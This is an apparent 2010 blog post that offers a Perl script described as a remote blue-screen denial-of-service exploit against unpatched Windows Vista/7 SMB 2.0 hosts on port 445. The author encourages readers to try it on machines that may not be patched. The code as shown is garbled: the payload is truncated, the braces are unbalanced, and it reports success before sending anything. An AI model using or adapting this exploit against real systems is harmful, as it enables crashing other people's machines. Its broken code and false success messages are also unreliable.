Kamis, 22 Juli 2010

WinVista/7 SMB 2.0 BSoD Exploit! - Coded by Phizo

*This exploit is a remote BSoD vulnerability for winvista and windows 7 machines, some have been patched, and some machines haven't been patched*

Today, I was talking to my friend gotroot and I asked him if it was possible to convert this python exploit (the python version of this exploit) and convert it to Perl, so I ended up doing that with some help from him, he told me about the "use strict;" function and about "my" but the rest of the code I knew already :)

Here is the exploit code:


use IO::Socket;
use strict;

my $host = $ARGV[0];
if($host) {
} else {
print "#! Usage: Smb-Bsod.pl !#\n\n\a";
my $port = '445';

my $payload = "\x00\x00\x00\x90".

my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"$port", Timeout=>'15') || die "Exploit failed to connect to the machine.\n\n";

print "System has been successfully exploited!\n\a";
print "Attempting to inject payload...\n";
print $sock "$payload";
print "Payload has been injected successfully!\n\a";

#coded by Phizo-
#vulnerability discovered by Laurent GaffiƩ-
This code is user friendly, and you should be able to use this exploit. Do not rip this and call it your own either :) I will know, because this is unique and no one else has created this exploit in perl.

Enjoy the exploit! (Some systems have patched this, but you can still try, some people don't patch :P)  

Tidak ada komentar:

Posting Komentar